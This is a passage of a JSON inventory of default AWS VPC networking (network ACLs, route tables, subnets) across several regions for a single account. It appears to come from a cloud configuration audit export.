false,"MapPublicIpOnLaunch": true,"OwnerId": "430150006394","State": "available","SubnetArn": "arn:aws:ec2:ap-southeast-2:430150006394:subnet/subnet-b3fe86eb","SubnetId": "subnet-b3fe86eb","VpcId": "vpc-5d22c33b","flow_logs": [],"name": "subnet-b3fe86eb","network_acl": "acl-4e4dc228"}}}},"vpcs_count": 1,"vpn_connections": {},"vpn_connections_count": 0,"vpn_gateways": {},"vpn_gateways_count": 0},"ca-central-1": {"customer_gateways": {},"customer_gateways_count": 0,"flow_logs": {},"flow_logs_count": 0,"network_acls_count": 1,"peering_connections": {},"peering_connections_count": 0,"region": "ca-central-1","route_tables_count": 1,"subnets_count": 3,"vpc_resource_types": ["network_acls","subnets","route_tables"],"vpcs": {"vpc-b5113ddd": {"name": "vpc-b5113ddd","network_acls": {"acl-63e1ed0b": {"Associations": [{"NetworkAclAssociationId": "aclassoc-31d33c50","NetworkAclId": "acl-63e1ed0b","SubnetId": "subnet-85711fff"},{"NetworkAclAssociationId": "aclassoc-33d33c52","NetworkAclId": "acl-63e1ed0b","SubnetId": "subnet-4f896210"},{"NetworkAclAssociationId": "aclassoc-30d33c51","NetworkAclId": "acl-63e1ed0b","SubnetId": "subnet-1cd98b74"}],"IsDefault": true,"OwnerId": "430150006394","Tags": [],"VpcId": "vpc-b5113ddd","allow_all_egress_traffic": "100","allow_all_ingress_traffic": "100","id": "acl-63e1ed0b","name": "acl-63e1ed0b","rules": {"egress": {"100": {"CidrBlock": "0.0.0.0/0","RuleAction": "allow","port_range": "1-65535","protocol": "ALL"},"32767": {"CidrBlock": "0.0.0.0/0","RuleAction": "deny","port_range": "1-65535","protocol": "ALL"}},"ingress": {"100": {"CidrBlock": "0.0.0.0/0","RuleAction": "allow","port_range": "1-65535","protocol": "ALL"},"32767": {"CidrBlock": "0.0.0.0/0","RuleAction": "deny","port_range": "1-65535","protocol": "ALL"}}},"use_default_egress_rules": true,"use_default_ingress_rules": true}},"route_tables": {"rtb-cc2e36a4": {"Associations": [{"AssociationState": {"State": "associated"},"Main": true,"RouteTableAssociationId": "rtbassoc-a462e9cf","RouteTableId": "rtb-cc2e36a4"}],"PropagatingVgws": [],"Routes": [{"DestinationCidrBlock": "172.31.0.0/16","GatewayId": "local","Origin": "CreateRouteTable","State": "active"},{"DestinationCidrBlock": "0.0.0.0/0","GatewayId": "igw-fa509a92","Origin": "CreateRoute","State": "active"}],"name": "vpc-b5113ddd"}},"subnets": {"subnet-1cd98b74": {"AssignIpv6AddressOnCreation": false,"AvailabilityZone": "ca-central-1a","AvailabilityZoneId": "cac1-az1","AvailableIpAddressCount": 4091,"CidrBlock": "172.31.16.0/20","DefaultForAz": true,"Ipv6CidrBlockAssociationSet": [],"MapCustomerOwnedIpOnLaunch": false,"MapPublicIpOnLaunch": true,"OwnerId": "430150006394","State": "available","SubnetArn": "arn:aws:ec2:ca-central-1:430150006394:subnet/subnet-1cd98b74","SubnetId": "subnet-1cd98b74","VpcId": "vpc-b5113ddd","flow_logs": [],"name": "subnet-1cd98b74","network_acl": "acl-63e1ed0b"},"subnet-4f896210": {"AssignIpv6AddressOnCreation": false,"AvailabilityZone": "ca-central-1d","AvailabilityZoneId": "cac1-az4","AvailableIpAddressCount": 4091,"CidrBlock": "172.31.32.0/20","DefaultForAz": true,"Ipv6CidrBlockAssociationSet": [],"MapCustomerOwnedIpOnLaunch": false,"MapPublicIpOnLaunch": true,"OwnerId": "430150006394","State": "available","SubnetArn": "arn:aws:ec2:ca-central-1:430150006394:subnet/subnet-4f896210","SubnetId": "subnet-4f896210","VpcId": "vpc-b5113ddd","flow_logs": [],"name": "subnet-4f896210","network_acl": "acl-63e1ed0b"},"subnet-85711fff": {"AssignIpv6AddressOnCreation": false,"AvailabilityZone": "ca-central-1b","AvailabilityZoneId": "cac1-az2","AvailableIpAddressCount": 4091,"CidrBlock": "172.31.0.0/20","DefaultForAz": true,"Ipv6CidrBlockAssociationSet": [],"MapCustomerOwnedIpOnLaunch": false,"MapPublicIpOnLaunch": true,"OwnerId": "430150006394","State": "available","SubnetArn": "arn:aws:ec2:ca-central-1:430150006394:subnet/subnet-85711fff","SubnetId": "subnet-85711fff","VpcId": "vpc-b5113ddd","flow_logs": [],"name": "subnet-85711fff","network_acl": "acl-63e1ed0b"}}}},"vpcs_count": 1,"vpn_connections": {},"vpn_connections_count": 0,"vpn_gateways": {},"vpn_gateways_count": 0},"eu-central-1": {"customer_gateways": {},"customer_gateways_count": 0,"flow_logs": {},"flow_logs_count": 0,"network_acls_count": 1,"peering_connections": {},"peering_connections_count": 0,"region": "eu-central-1","route_tables_count": 1,"subnets_count": 3,"vpc_resource_types": ["network_acls","subnets","route_tables"],"vpcs": {"vpc-78b43312": {"name": "vpc-78b43312","network_acls": {"acl-6ebcec04": {"Associations": [{"NetworkAclAssociationId": "aclassoc-36773353","NetworkAclId": "acl-6ebcec04","SubnetId": "subnet-55d77f19"},{"NetworkAclAssociationId": "aclassoc-31773354","NetworkAclId": "acl-6ebcec04","SubnetId": "subnet-292d4343"},{"NetworkAclAssociationId": "aclassoc-30773355","NetworkAclId": "acl-6ebcec04","SubnetId": "subnet-ecc66390"}],"IsDefault": true,"OwnerId": "430150006394","Tags": [],"VpcId": "vpc-78b43312","allow_all_egress_traffic": "100","allow_all_ingress_traffic": "100","id": "acl-6ebcec04","name": "acl-6ebcec04","rules": {"egress": {"100": {"CidrBlock": "0.0.0.0/0","RuleAction": "allow","port_range": "1-65535","protocol": "ALL"},"32767": {"CidrBlock": "0.0.0.0/0","RuleAction": "deny","port_range": "1-65535","protocol": "ALL"}},"ingress": {"100": {"CidrBlock": "0.0.0.0/0","RuleAction": "allow","port_range": "1-65535","protocol": "ALL"},"32767": {"CidrBlock": "0.0.0.0/0","RuleAction": "deny","port_range": "1-65535","protocol": "ALL"}}},"use_default_egress_rules": true,"use_default_ingress_rules": true}},"route_tables": {"rtb-50be873a": {"Associations": [{"AssociationState": {"State": "associated"},"Main": true,"RouteTableAssociationId": "rtbassoc-059c9468","RouteTableId": "rtb-50be873a"}],"PropagatingVgws": [],"Routes": [{"DestinationCidrBlock": "172.31.0.0/16","GatewayId": "local","Origin": "CreateRouteTable","State": "active"},{"DestinationCidrBlock": "0.0.0.0/0","GatewayId": "igw-6d7fc506","Origin": "CreateRoute","State": "active"}],"name": "vpc-78b43312"}},"subnets": {"subnet-292d4343": {"AssignIpv6AddressOnCreation": false,"AvailabilityZone": "eu-central-1a","AvailabilityZoneId": "euc1-az2","AvailableIpAddressCount": 4091,"CidrBlock": "172.31.16.0/20","DefaultForAz": true,"Ipv6CidrBlockAssociationSet": [],"MapCustomerOwnedIpOnLaunch": false,"MapPublicIpOnLaunch": true,"OwnerId": "430150006394","State": "available","SubnetArn": "arn:aws:ec2:eu-central-1:430150006394:subnet/subnet-292d4343","SubnetId": "subnet-292d4343","VpcId": "vpc-78b43312","flow_logs": [],"name": "subnet-292d4343","network_acl": "acl-6ebcec04"},"subnet-55d77f19": {"AssignIpv6AddressOnCreation": false,"AvailabilityZone": "eu-central-1c","AvailabilityZoneId": "euc1-az1","AvailableIpAddressCount": 4091,"CidrBlock": "172.31.0.0/20","DefaultForAz": true,"Ipv6CidrBlockAssociationSet": [],"MapCustomerOwnedIpOnLaunch": false,"MapPublicIpOnLaunch": true,"OwnerId": "430150006394","State": "available","SubnetArn": "arn:aws:ec2:eu-central-1:430150006394:subnet/subnet-55d77f19","SubnetId": "subnet-55d77f19","VpcId": "vpc-78b43312","flow_logs": [],"name": "subnet-55d77f19","network_acl": "acl-6ebcec04"},"subnet-ecc66390": {"AssignIpv6AddressOnCreation": false,"AvailabilityZone": "eu-central-1b","AvailabilityZoneId": "euc1-az3","AvailableIpAddressCount": 4091,"CidrBlock": "172.31.32.0/20","DefaultForAz": true,"Ipv6CidrBlockAssociationSet": [],"MapCustomerOwnedIpOnLaunch": false,"MapPublicIpOnLaunch": true,"OwnerId": "430150006394","State": "available","SubnetArn": "arn:aws:ec2:eu-central-1:430150006394:subnet/subnet-ecc66390","SubnetId": "subnet-ecc66390","VpcId": "vpc-78b43312","flow_logs": [],"name": "subnet-ecc66390","network_acl": "acl-6ebcec04"}}}},"vpcs_count": 1,"vpn_connections": {},"vpn_connections_count": 0,"vpn_gateways": {},"vpn_gateways_count": 0},"eu-north-1": {"customer_gateways": {},"customer_gateways_count": 0,"flow_logs": {},"flow_logs_count": 0,"network_acls_count": 1,"peering_connections": {},"peering_connections_count": 0,"region": "eu-north-1","route_tables_count": 1,"subnets_count": 3,"vpc_resource_types": ["network_acls","subnets","route_tables"],"vpcs": {"vpc-fa259d93": {"name": "vpc-fa259d93","network_acls": {"acl-dfb10ab6": {"Associations": [{"NetworkAclAssociationId": "aclassoc-8ed1b4e3","NetworkAclId": "acl-dfb10ab6","SubnetId": "subnet-1d972e74"},{"NetworkAclAssociationId": "aclassoc-89d1b4e4","NetworkAclId": "acl-dfb10ab6","SubnetId": "subnet-fe16ce85"},{"NetworkAclAssociationId": "aclassoc-8fd1b4e2","NetworkAclId": "acl-dfb10ab6","SubnetId": "subnet-c98e7484"}],"IsDefault": true,"OwnerId": "430150006394","Tags": [],"VpcId": "vpc-fa259d93","allow_all_egress_traffic": "100","allow_all_ingress_traffic": "100","id": "acl-dfb10ab6","name": "acl-dfb10ab6","rules": {"egress": {"100": {"CidrBlock": "0.0.0.0/0","RuleAction": "allow","port_range": "1-65535","protocol": "ALL"},"32767": {"CidrBlock": "0.0.0.0/0","RuleAction": "deny","port_range": "1-65535","protocol": "ALL"}},"ingress": {"100": {"CidrBlock": "0.0.0.0/0","RuleAction": "allow","port_range": "1-65535","protocol": "ALL"},"32767": {"CidrBlock": "0.0.0.0/0","RuleAction": "deny","port_range": "1-65535","protocol": "ALL"}}},"use_default_egress_rules": true,"use_default_ingress_rules": true}},"route_tables": {"rtb-fd6dd694": {"Associations": [{"AssociationState": {"State": "associated"},"Main": true,"RouteTableAssociationId": "rtbassoc-3e813a57","RouteTableId": "rtb-fd6dd694"}],"PropagatingVgws": [],"Routes": [{"DestinationCidrBlock": "172.31.0.0/16","GatewayId": "local","Origin": "CreateRouteTable","State": "active"},{"DestinationCidrBlock": "0.0.0.0/0","GatewayId": "igw-05da646c","Origin": "CreateRoute","State": "active"}],"name": "vpc-fa259d93"}},"subnets": {"subnet-1d972e74": {"AssignIpv6AddressOnCreation": false,"AvailabilityZone": "eu-north-1a","AvailabilityZoneId": "eun1-az1","AvailableIpAddressCount": 4091,"CidrBlock": "172.31.16.0/20","DefaultForAz": true,"Ipv6CidrBlockAssociationSet": [],"MapCustomerOwnedIpOnLaunch": false,"MapPublicIpOnLaunch": true,"OwnerId": "430150006394","State": "available","SubnetArn": "arn:aws:ec2:eu-north-1:430150006394:subnet/subnet-1d972e74","SubnetId": "subnet-1d972e74","VpcId": "vpc-fa259d93","flow_logs": [],"name": "subnet-1d972e74","network_acl": "acl-dfb10ab6"},"subnet-c98e7484": {"AssignIpv6AddressOnCreation": false,"AvailabilityZone": "eu-north-1c","AvailabilityZoneId": "eun1-az3","AvailableIpAddressCount": 4091,"CidrBlock": "172.31.0.0/20","DefaultForAz": true,"Ipv6CidrBlockAssociationSet": [],"MapCustomerOwnedIpOnLaunch": false,"MapPublicIpOnLaunch": true,"OwnerId": "430150006394","State": "available","SubnetArn": "arn:aws:ec2:eu-north-1:430150006394:subnet/subnet-c98e7484","SubnetId": "subnet-c98e7484","VpcId": "vpc-fa259d93","flow_logs": [],"name": "subnet-c98e7484","network_acl": "acl-dfb10ab6"},"subnet-fe16ce85": {"AssignIpv6AddressOnCreation": false,"AvailabilityZone": "eu-north-1b","AvailabilityZoneId": "eun1-az2","AvailableIpAddressCount": 4091,"CidrBlock": "172.31.32.0/20","DefaultForAz": true,"Ipv6CidrBlockAssociationSet": [],"MapCustomerOwnedIpOnLaunch": false,"MapPublicIpOnLaunch": true,"OwnerId": "430150006394","State": "available","SubnetArn": "arn:aws:ec2:eu-north-1:430150006394:subnet/subnet-fe16ce85","SubnetId": "subnet-fe16ce85","VpcId": "vpc-fa259d93","flow_logs": [],"name": "subnet-fe16ce85","network_acl": "acl-dfb10ab6"}}}},"vpcs_count": 1,"vpn_connections": {},"vpn_connections_count": 0,"vpn_gateways": {},"vpn_gateways_count": 0},"eu-south-1": {"customer_gateways": {},"customer_gateways_count": 0,"flow_logs": {},"flow_logs_count": 0,"network_acls_count": 0,"peering_connections": {},"peering_connections_count": 0,"region": "eu-south-1","route_tables_count": 0,"subnets_count": 0,"vpc_resource_types": ["network_acls","subnets","route_tables"],"vpcs": {},"vpcs_count": 0,"vpn_connections": {},"vpn_connections_count": 0,"vpn_gateways": {},"vpn_gateways_count": 0},"eu-west-1": {"customer_gateways": {},"customer_gateways_count": 0,"flow_logs": {},"flow_logs_count": 0,"network_acls_count": 1,"peering_connections": {},"peering_connections_count": 0,"region": "eu-west-1","route_tables_count": 1,"subnets_count": 3,"vpc_resource_types": ["network_acls","subnets","route_tables"],"vpcs": {"vpc-f24c7994": {"name": "vpc-f24c7994","network_acls": {"acl-ed4be494": {"Associations": [{"NetworkAclAssociationId": "aclassoc-5a508624","NetworkAclId": "acl-ed4be494","SubnetId": "subnet-b3a000e9"},{"NetworkAclAssociationId": "aclassoc-5d508623","NetworkAclId": "acl-ed4be494","SubnetId": "subnet-214f3969"},{"NetworkAclAssociationId": "aclassoc-5c508622","NetworkAclId": "acl-ed4be494","SubnetId": "subnet-b1c2a5d7"}],"IsDefault": true,"OwnerId": "430150006394","Tags": [],"VpcId": "vpc-f24c7994","allow_all_egress_traffic": "100","allow_all_ingress_traffic": "100","id": "acl-ed4be494","name": "acl-ed4be494","rules": {"egress": {"100": {"CidrBlock": "0.0.0.0/0","RuleAction": "allow","port_range": "1-65535","protocol": "ALL"},"32767": {"CidrBlock": "0.0.0.0/0","RuleAction": "deny","port_range": "1-65535","protocol": "ALL"}},"ingress": {"100": {"CidrBlock": "0.0.0.0/0","RuleAction": "allow","port_range": "1-65535","protocol": "ALL"},"32767": {"CidrBlock": "0.0.0.0/0","RuleAction": "deny","port_range": "1-65535","protocol": "ALL"}}},"use_default_egress_rules": true,"use_default_ingress_rules": true}},"route_tables": {"rtb-d3b1edaa": {"Associations": [{"AssociationState": {"State": "associated"},"Main": true,"RouteTableAssociationId": "rtbassoc-ad17b7d6","RouteTableId": "rtb-d3b1edaa"}],"PropagatingVgws": [],"Routes": [{"DestinationCidrBlock": "172.31.0.0/16","GatewayId": "local","Origin": "CreateRouteTable","State": "active"},{"DestinationCidrBlock": "0.0.0.0/0","GatewayId": "igw-1c7b5d7b","Origin": "CreateRoute","State": "active"}],"name": "vpc-f24c7994"}},"subnets": {"subnet-214f3969": {"AssignIpv6AddressOnCreation": false,"AvailabilityZone": "eu-west-1a","AvailabilityZoneId": "euw1-az2","AvailableIpAddressCount": 4091,"CidrBlock": "172.31.16.0/20","DefaultForAz": true,"Ipv6CidrBlockAssociationSet": [],"MapCustomerOwnedIpOnLaunch": false,"MapPublicIpOnLaunch": true,"OwnerId": "430150006394","State": "available","SubnetArn": "arn:aws:ec2:eu-west-1:430150006394:subnet/subnet-214f3969","SubnetId": "subnet-214f3969","VpcId": "vpc-f24c7994","flow_logs": [],"name": "subnet-214f3969","network_acl": "acl-ed4be494"},"subnet-b1c2a5d7": {"AssignIpv6AddressOnCreation": false,"AvailabilityZone": "eu-west-1c","AvailabilityZoneId": "euw1-az1","AvailableIpAddressCount": 4091,"CidrBlock": "172.31.0.0/20","DefaultForAz": true,"Ipv6CidrBlockAssociationSet": [],"MapCustomerOwnedIpOnLaunch": false,"MapPublicIpOnLaunch": true,"OwnerId": "430150006394","State": "available","SubnetArn": "arn:aws:ec2:eu-west-1:430150006394:subnet/subnet-b1c2a5d7","SubnetId": "subnet-b1c2a5d7","VpcId": "vpc-f24c7994","flow_logs": [],"name": "subnet-b1c2a5d7","network_acl": "acl-ed4be494"},"subnet-b3a000e9": {"AssignIpv6AddressOnCreation": false,"AvailabilityZone": "eu-west-1b","AvailabilityZoneId": "euw1-az3","AvailableIpAddressCount": 4091,"CidrBlock": "172.31.32.0/20","DefaultForAz": true,"Ipv6CidrBlockAssociationSet": [],"MapCustomerOwnedIpOnLaunch": false,"MapPublicIpOnLaunch": true,"OwnerId": "430150006394","State": "available","SubnetArn": "arn:aws:ec2:eu-west-1:430150006394:subnet/subnet-b3a000e9","SubnetId": "subnet-b3a000e9","VpcId": "vpc-f24c7994","flow_logs": [],"name": "subnet-b3a000e9","network_acl": "acl-ed4be494"}}}},"vpcs_count": 1,"vpn_connections": {},"vpn_connections_count": 0,"vpn_gateways": {},"vpn_gateways_count": 0},"eu-west-2": {"customer_gateways": {},"customer_gateways_count": 0,"flow_logs": {},"flow_logs_count": 0,"network_acls_count": 1,"peering_connections": {},"peering_connections_count": 0,"region": "eu-west-2","route_tables_count": 1,"subnets_count": 3,"vpc_resource_types": ["network_acls","subnets","route_tables"],"vpcs": {"vpc-3fa2fa57": {"name": "vpc-3fa2fa57","network_acls": {"acl-003d0768": {"Associations": [{"NetworkAclAssociationId": "aclassoc-e73eff86","NetworkAclId": "acl-003d0768","SubnetId": "subnet-43bf9d2a"},{"NetworkAclAssociationId": "aclassoc-e93eff88","NetworkAclId": "acl-003d0768","SubnetId": "subnet-edaf13a1"},{"NetworkAclAssociationId": "aclassoc-e63eff87","NetworkAclId": "acl-003d0768","SubnetId": "subnet-e682ec9c"}],"IsDefault": true,"OwnerId": "430150006394","Tags": [],"VpcId": "vpc-3fa2fa57","allow_all_egress_traffic": "100","allow_all_ingress_traffic": "100","id": "acl-003d0768","name": "acl-003d0768","rules": {"egress": {"100": {"CidrBlock": "0.0.0.0/0","RuleAction": "allow","port_range": "1-65535","protocol": "ALL"},"32767": {"CidrBlock": "0.0.0.0/0","RuleAction": "deny","port_range": "1-65535","protocol": "ALL"}},"ingress": {"100": {"CidrBlock": "0.0.0.0/0","RuleAction": "allow","port_range": "1-65535","protocol": "ALL"},"32767": {"CidrBlock": "0.0.0.0/0","RuleAction": "deny","port_range": "1-65535","protocol": "ALL"}}},"use_default_egress_rules": true,"use_default_ingress_rules": true}},"route_tables": {"rtb-355f4b5d": {"Associations": [{"AssociationState": {"State": "associated"},"Main": true,"RouteTableAssociationId": "rtbassoc-0d980b66","RouteTableId": "rtb-355f4b5d"}],"PropagatingVgws": [],"Routes": [{"DestinationCidrBlock": "172.31.0.0/16","GatewayId": "local","Origin": "CreateRouteTable","State": "active"},{"DestinationCidrBlock": "0.0.0.0/0","GatewayId": "igw-02599a6a","Origin": "CreateRoute","State": "active"}],"name": "vpc-3fa2fa57"}},"subnets": {"subnet-43bf9d2a": {"AssignIpv6AddressOnCreation": false,"AvailabilityZone": "eu-west-2c","AvailabilityZoneId": "euw2-az1","AvailableIpAddressCount": 4091,"CidrBlock": "172.31.0.0/20","DefaultForAz": true,"Ipv6CidrBlockAssociationSet": [],"MapCustomerOwnedIpOnLaunch": false,"MapPublicIpOnLaunch": true,"OwnerId": "430150006394","State": "available","SubnetArn": "arn:aws:ec2:eu-west-2:430150006394:subnet/subnet-43bf9d2a","SubnetId": "subnet-43bf9d2a","VpcId": "vpc-3fa2fa57","flow_logs": [],"name": "subnet-43bf9d2a","network_acl": "acl-003d0768"},"subnet-e682ec9c": {"AssignIpv6AddressOnCreation": false,"AvailabilityZone": "eu-west-2a","AvailabilityZoneId": "euw2-az2","AvailableIpAddressCount": 4091,"CidrBlock": "172.31.16.0/20","DefaultForAz": true,"Ipv6CidrBlockAssociationSet": [],"MapCustomerOwnedIpOnLaunch": false,"MapPublicIpOnLaunch": true,"OwnerId": "430150006394","State": "available","SubnetArn": "arn:aws:ec2:eu-west-2:430150006394:subnet/subnet-e682ec9c","SubnetId": "subnet-e682ec9c","VpcId": "vpc-3fa2fa57","flow_logs": [],"name": "subnet-e682ec9c","network_acl": "acl-003d0768"},"subnet-edaf13a1": {"AssignIpv6AddressOnCreation": false,"AvailabilityZone": "eu-west-2b","AvailabilityZoneId": "euw2-az3","AvailableIpAddressCount": 4091,"CidrBlock": "172.31.32.0/20","DefaultForAz": true,"Ipv6CidrBlockAssociationSet": [],"MapCustomerOwnedIpOnLaunch": false,"MapPublicIpOnLaunch": true,"OwnerId": "430150006394","State": "available","SubnetArn": "arn:aws:ec2:eu-west-2:430150006394:subnet/subnet-edaf13a1","SubnetId": "subnet-edaf13a1","VpcId": "vpc-3fa2fa57","flow_logs": [],"name": "subnet-edaf13a1","network_acl": "acl-003d0768"}}}},"vpcs_count": 1,"vpn_connections": {},"vpn_connections_count": 0,"vpn_gateways": {},"vpn_gateways_count": 0},"eu-west-3": {"customer_gateways": {},"customer_gateways_count": 0,"flow_logs": {},"flow_logs_count": 0,"network_acls_count": 1,"peering_connections": {},"peering_connections_count": 0,"region": "eu-west-3","route_tables_count": 1,"subnets_count": 3,"vpc_resource_types": ["network_acls","subnets","route_tables"],"vpcs": {"vpc-87d3fdee": {"name": "vpc-87d3fdee","network_acls": {"acl-c74e7dae": {"Associations": [{"NetworkAclAssociationId": "aclassoc-de1211b6","NetworkAclId": "acl-c74e7dae","SubnetId": "subnet-762a450d"},{"NetworkAclAssociationId": "aclassoc-dd1211b5","NetworkAclId": "acl-c74e7dae","SubnetId": "subnet-e9e1b480"},{"NetworkAclAssociationId": "aclassoc-df1211b7","NetworkAclId": "acl-c74e7dae","SubnetId": "subnet-b309b8fe"}],"IsDefault": true,"OwnerId": "430150006394","Tags": [],"VpcId": "vpc-87d3fdee","allow_all_egress_traffic": "100","allow_all_ingress_traffic": "100","id": "acl-c74e7dae","name": "acl-c74e7dae","rules": {"egress": {"100": {"CidrBlock": "0.0.0.0/0","RuleAction": "allow","port_range": "1-65535","protocol": "ALL"},"32767": {"CidrBlock": "0.0.0.0/0","RuleAction": "deny","port_range": "1-65535","protocol": "ALL"}},"ingress": {"100": {"CidrBlock": "0.0.0.0/0","RuleAction": "allow","port_range": "1-65535","protocol": "ALL"},"32767": {"CidrBlock": "0.0.0.0/0","RuleAction": "deny","port_range": "1-65535","protocol": "ALL"}}},"use_default_egress_rules": true,"use_default_ingress_rules": true}},"route_tables": {"rtb-7f447a16": {"Associations": [{"AssociationState": {"State": "associated"},"Main": true,"RouteTableAssociationId": "rtbassoc-8eaa41e6","RouteTableId": "rtb-7f447a16"}],"PropagatingVgws": [],"Routes": [{"DestinationCidrBlock": "172.31.0.0/16","GatewayId": "local","Origin": "CreateRouteTable","State": "active"},{"DestinationCidrBlock": "0.0.0.0/0","GatewayId": "igw-54caa73d","Origin": "CreateRoute","State": "active"}],"name": "vpc-87d3fdee"}},"subnets": {"subnet-762a450d": {"AssignIpv6AddressOnCreation": false,"AvailabilityZone": "eu-west-3b","AvailabilityZoneId": "euw3-az2","AvailableIpAddressCount": 4091,"CidrBlock": "172.31.16.0/20","DefaultForAz": true,"Ipv6CidrBlockAssociationSet": [],"MapCustomerOwnedIpOnLaunch": false,"MapPublicIpOnLaunch": true,"OwnerId": "430150006394","State": "available","SubnetArn": "arn:aws:ec2:eu-west-3:430150006394:subnet/subnet-762a450d","SubnetId": "subnet-762a450d","VpcId": "vpc-87d3fdee","flow_logs": [],"name": "subnet-762a450d","network_acl": "acl-c74e7dae"},"subnet-b309b8fe": {"AssignIpv6AddressOnCreation": false,"AvailabilityZone": "eu-west-3c","AvailabilityZoneId": "euw3-az3","AvailableIpAddressCount": 4091,"CidrBlock": "172.31.32.0/20","DefaultForAz": true,"Ipv6CidrBlockAssociationSet": [],"MapCustomerOwnedIpOnLaunch": false,"MapPublicIpOnLaunch": true,"OwnerId": "430150006394","State": "available","SubnetArn": "arn:aws:ec2:eu-west-3:430150006394:subnet/subnet-b309b8fe","SubnetId": "subnet-b309b8fe","VpcId": "vpc-87d3fdee","flow_logs": [],"name": "subnet-b309b8fe","network_acl": "acl-c74e7dae"},"subnet-e9e1b480": {"AssignIpv6AddressOnCreation": false,"AvailabilityZone": "eu-west-3a","AvailabilityZoneId": "euw3-az1","AvailableIpAddressCount": 4091,"CidrBlock": "172.31.0.0/20","DefaultForAz": true,"Ipv6CidrBlockAssociationSet": [],"MapCustomerOwnedIpOnLaunch": false,"MapPublicIpOnLaunch": true,"OwnerId": "430150006394","State": "available","SubnetArn": "arn:aws:ec2:eu-west-3:430150006394:subnet/subnet-e9e1b480","SubnetId": "subnet-e9e1b480","VpcId": "vpc-87d3fdee","flow_logs": [],"name": "subnet-e9e1b480","network_acl": "acl-c74e7dae"}}}},"vpcs_count": 1,"vpn_connections": {},"vpn_connections_count": 0,"vpn_gateways": {},"vpn_gateways_count": 0},"me-south-1": {"customer_gateways": {},"customer_gateways_count": 0,"flow_logs": {},"flow_logs_count": 0,"network_acls_count": 0,"peering_connections": {},"peering_connections_count": 0,"region": "me-south-1","route_tables_count": 0,"subnets_count": 0,"vpc_resource_types": ["network_acls","subnets","route_tables"],"vpcs": {},"vpcs_count": 0,"vpn_connections": {},"vpn_connections_count": 0,"vpn_gateways": {},"vpn_gateways_count": 0},"sa-east-1": {"customer_gateways": {},"customer_gateways_count": 0,"flow_logs": {},"flow_logs_count": 0,"network_acls_count": 1,"peering_connections": {},"peering_connections_count": 0,"region": "sa-east-1","route_tables_count": 1,"subnets_count": 3,"vpc_resource_types": ["network_acls","subnets","route_tables"],"vpcs": {"vpc-b14fa4d7": {"name": "vpc-b14fa4d7","network_acls": {"acl-43816e25": {"Associations": [{"NetworkAclAssociationId": "aclassoc-7477890a","NetworkAclId": "acl-43816e25","SubnetId": "subnet-9aa5c1fc"},{"NetworkAclAssociationId": "aclassoc-7277890c","NetworkAclId": "acl-43816e25","SubnetId": "subnet-aaddbef1"},{"NetworkAclAssociationId": "aclassoc-7577890b","NetworkAclId": "acl-43816e25","SubnetId": "subnet-6a4dd723"}],"IsDefault": true,"OwnerId": "430150006394","Tags": [],"VpcId": "vpc-b14fa4d7","allow_all_egress_traffic": "100","allow_all_ingress_traffic": "100","id": "acl-43816e25","name": "acl-43816e25","rules": {"egress": {"100": {"CidrBlock": "0.0.0.0/0","RuleAction": "allow","port_range": "1-65535","protocol": "ALL"},"32767": {"CidrBlock": "0.0.0.0/0","RuleAction": "deny","port_range": "1-65535","protocol": "ALL"}},"ingress": {"100": {"CidrBlock": "0.0.0.0/0","RuleAction": "allow","port_range": "1-65535","protocol": "ALL"},"32767": {"CidrBlock": "0.0.0.0/0","RuleAction": "deny","port_range": "1-65535","protocol": "ALL"}}},"use_default_egress_rules": true,"use_default_ingress_rules": true}},"route_tables": {"rtb-6744ba01": {"Associations": [{"AssociationState": {"State": "associated"},"Main": true,"RouteTableAssociationId": "rtbassoc-f18b5288","RouteTableId": "rtb-6744ba01"}],"PropagatingVgws": [],"Routes": [{"DestinationCidrBlock": "172.31.0.0/16","GatewayId": "local","Origin": "CreateRouteTable","State": "active"},{"DestinationCidrBlock": "0.0.0.0/0","GatewayId": "igw-440e2e20","Origin": "CreateRoute","State": "active"}],"name": "vpc-b14fa4d7"}},"subnets": {"subnet-6a4dd723": {"AssignIpv6AddressOnCreation": false,"AvailabilityZone": "sa-east-1b","AvailabilityZoneId": "sae1-az2","AvailableIpAddressCount": 4091,"CidrBlock": "172.31.16.0/20","DefaultForAz": true,"Ipv6CidrBlockAssociationSet": [],"MapCustomerOwnedIpOnLaunch": false,"MapPublicIpOnLaunch": true,"OwnerId": "430150006394","State": "available","SubnetArn": "arn:aws:ec2:sa-east-1:430150006394:subnet/subnet-6a4dd723","SubnetId": "subnet-6a4dd723","VpcId": "vpc-b14fa4d7","flow_logs": [],"name": "subnet-6a4dd723","network_acl": "acl-43816e25"},"subnet-9aa5c1fc": {"AssignIpv6AddressOnCreation": false,"AvailabilityZone": "sa-east-1a","AvailabilityZoneId": "sae1-az1","AvailableIpAddressCount": 4091,"CidrBlock": "172.31.0.0/20","DefaultForAz": true,"Ipv6CidrBlockAssociationSet": [],"MapCustomerOwnedIpOnLaunch": false,"MapPublicIpOnLaunch": true,"OwnerId": "430150006394","State": "available","SubnetArn": "arn:aws:ec2:sa-east-1:430150006394:subnet/subnet-9aa5c1fc","SubnetId": "subnet-9aa5c1fc","VpcId": "vpc-b14fa4d7","flow_logs": [],"name": "subnet-9aa5c1fc","network_acl": "acl-43816e25"},"subnet-aaddbef1": {"AssignIpv6AddressOnCreation": false,"AvailabilityZone": "sa-east-1c","AvailabilityZoneId": "sae1-az3","AvailableIpAddressCount": 4091,"CidrBlock": "172.31.32.0/20","DefaultForAz": true,"Ipv6CidrBlockAssociationSet": [],"MapCustomerOwnedIpOnLaunch": false,"MapPublicIpOnLaunch": true,"OwnerId": "430150006394","State": "available","SubnetArn": "arn:aws:ec2:sa-east-1:430150006394:subnet/subnet-aaddbef1","SubnetId": "subnet-aaddbef1","VpcId": "vpc-b14fa4d7","flow_logs": [],"name": "subnet-aaddbef1","network_acl": "acl-43816e25"}}}},"vpcs_count": 1,"vpn_connections": {},"vpn_connections_count": 0,"vpn_gateways": {},"vpn_gateways_count": 0},"us-east-1": {"customer_gateways": {},"customer_gateways_count": 0,"flow_logs": {},"flow_logs_count": 0,"network_acls_count": 1,"peering_connections": {},"peering_connections_count": 0,"region": "us-east-1","route_tables_count": 1,"subnets_count": 6,"vpc_resource_types": ["network_acls","subnets","route_tables"],"vpcs": {"vpc-ba1cbdc7": {"name": "vpc-ba1cbdc7","network_acls": {"acl-f1a6ae8c": {"Associations": [{"NetworkAclAssociationId": "aclassoc-ad34c3ff","NetworkAclId": "acl-f1a6ae8c","SubnetId": "subnet-7056187e"},{"NetworkAclAssociationId": "aclassoc-af34c3fd","NetworkAclId": "acl-f1a6ae8c","SubnetId": "subnet-30be2f6f"},{"NetworkAclAssociationId": 